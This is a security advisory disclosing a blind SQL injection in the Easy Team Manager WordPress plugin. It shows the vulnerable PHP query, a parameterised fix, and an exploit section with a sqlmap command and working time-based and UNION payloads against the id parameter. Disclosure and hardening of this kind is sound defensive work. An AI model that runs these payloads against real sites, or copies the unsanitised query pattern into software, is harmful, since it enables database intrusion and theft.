Advisory #: 194
Title: Blind SQL Injection in Wordpress Plugin Easy Team Manager v1.3.2
Author: Larry W. Cashdollar, @_larry0
Date: 2017-05-24
CVE-ID: CVE-2017-1002023
CWE:
Download Site: https://wordpress.org/plugins/easy-team-manager/
Vendor: https://daisythemes.com/
Vendor Notified: 2017-05-24
Vendor Contact: web form contact
Advisory: http://www.vapidlabs.com/advisory.php?v=194
Description: Easy Team Manager helps you to create team members with their short descriptions and social profile links, with smooth hover effects.
Vulnerability:
The following code does not sanitize $_GET['id'] before making it part of an SQL statement in file ./easy-team-manager/inc/easy_team_manager_desc_edit.php (lines 85-95):

    global $wpdb;
    // $_GET['id'] is concatenated directly into the query string
    $easy_team_manager_desc = $wpdb->get_results("SELECT *from ".$wpdb->prefix."easy_team_manager_description where id=".$_GET['id']);
    foreach ($easy_team_manager_desc as $s ){
        $ind_name_detail = unserialize($s->name);
        $socia_media = unserialize($s->social_media);
        $id=$_GET['id'];
        $ind_position = esc_attr($s->position);
        $ind_image=$s->image;
        $ind_email_detail = unserialize($s->email);
        $ind_phone_detail = unserialize($s->phone);
        $ind_desc = esc_attr(stripcslashes($s->ind_description));

This allows blind SQL injection via the id parameter by an authenticated user with edit team privileges.
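For comparison, the same lookup written so that the id parameter cannot alter the SQL structure. This is an added example, not the plugin's or the author's code; the table name and the $_GET['id'] parameter are taken from the advisory, while the function name and the calling code are assumptions.

```php
<?php
// Added example (not the plugin's own code): hardened version of the
// vulnerable lookup above. The table name and $_GET['id'] come from the
// advisory; the function name and the caller below are assumptions.

function etm_get_description_row( $wpdb, $raw_id ) {
    // Coerce the parameter to a non-negative integer before it reaches SQL.
    // Anything that is not a plain number (e.g. a CASE/SLEEP expression or a
    // UNION suffix) collapses to 0 here and is rejected.
    $id = absint( $raw_id );
    if ( 0 === $id ) {
        return null;
    }

    // $wpdb->prepare() binds the value with %d, so the database only ever
    // sees an integer literal. The table prefix is trusted configuration,
    // not user input, so interpolating it is fine.
    $sql = $wpdb->prepare(
        "SELECT * FROM {$wpdb->prefix}easy_team_manager_description WHERE id = %d",
        $id
    );

    $rows = $wpdb->get_results( $sql );
    return $rows ? $rows[0] : null;
}

// Constructed caller standing in for the admin page logic.
global $wpdb;
$row = etm_get_description_row( $wpdb, isset( $_GET['id'] ) ? $_GET['id'] : 0 );
if ( null === $row ) {
    wp_die( 'Invalid team member id.' );
}
```

The rest of the original loop body (the unserialize() and esc_attr() calls) can then operate on $row unchanged; the injection point is removed at the query, not in the output handling.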
Exploit Code:
$ sqlmap -u 'http://example.com/wordpress/wp-admin/admin.php?page=easy_team_manager_edit&id=*' --load-cookies=./cookies.txt --level=4 --risk=3 --dbms=mysql

[08:39:09] [INFO] URI parameter '#1*' is 'MySQL UNION query (84) - 1 to 20 columns' injectable
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 3115 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace
    Payload: http://example.com:80/wordpress/wp-admin/admin.php?page=easy_team_manager_edit&id=(CASE WHEN (3623=3623) THEN SLEEP(5) ELSE 3623 END)

    Type: UNION query
    Title: MySQL UNION query (84) - 5 columns
    Payload: http://example.com:80/wordpress/wp-admin/admin.php?page=easy_team_manager_edit&id=-5307 UNION ALL SELECT 84,CONCAT(0x7170787a71,0x58795a426e467457726744686879446f4e4d7a576a464758516e6765526549536279426759527443,0x7178787171),84,84,84#
---
[08:39:15] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0.12
[08:39:15] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'

[*] shutting down at 08:39:15
Screen Shots:
Notes: